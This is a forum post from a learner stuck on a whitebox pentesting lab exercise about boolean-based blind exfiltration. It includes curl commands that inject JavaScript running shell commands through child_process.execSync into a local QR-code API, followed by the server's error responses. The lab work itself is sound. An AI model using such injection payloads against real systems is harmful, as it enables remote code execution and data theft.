Intro to Whitebox Pentesting: Blind Exploitation

For this section I need to do the following:
Challenge: Try to use what you learned in this section to reach boolean-based exfiltration using the exercise from the previous section, in which this would be possible. Instead of sleeping, you may send a different HTTP response code (e.g. 200 for match and 404 for fail). This would make you thoroughly understand how both techniques work, and how they differ from each other.

The flag at ‘/flag.txt’ consists of 3 digits. Try to use the payload from this section to find them, by iterating over [0-9] for each of the 3 digits (max 30 attempts needed).

Can someone help me solve this? This is what I have done so far: PrivateBin

I thought I solved it, but I still don’t understand how to do boolean-based exfiltration.

Create a local file flag.txt.

Tested with letter a to check the first letter from file flag.txt:

$ curl -i -s -X POST -H "Content-Type: application/json" -H "Authorization: bearer <toke>" -d '{ "text": "'\''}) + (function(){ var c = require(\"child_process\").execSync(\"ls | sort | cut -c1\").toString().trim(); if (c === \"a\") { return \"test\"; } else { throw \"fail\"; } })()//" }' http://localhost:5000/api/service/generate
HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 41
ETag: W/"29-vrivKbD3JnWI58RmWDGTwvyZnls"
Date: Mon, 12 May 2025 14:50:03 GMT
Connection: keep-alive
Keep-Alive: timeout=5

{"message":"Could not generate QR code."}
$ curl -i -s -X POST -H "Content-Type: application/json" -H "Authorization: bearer <toke>" -d '{ "text": "'\''}) + (function(){ var c = require(\"child_process\").execSync(\"ls | sort | cut -c1\").toString().trim(); if (c === \"f\") { return \"test\"; } else { throw new Error(\"fail\"); } })()//" }' http://localhost:5000/api/service/generate
HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 41
ETag: W/"29-vrivKbD3JnWI58RmWDGTwvyZnls"
Date: Mon, 12 May 2025 14:50:44 GMT
Connection: keep-alive
Keep-Alive: timeout=5

{"message":"Could not generate QR code."}

I always get HTTP/1.1 500 Internal Server Error.

Anyone?

Here is also https://pastebin.com/6P1X3whR for more information on what I did.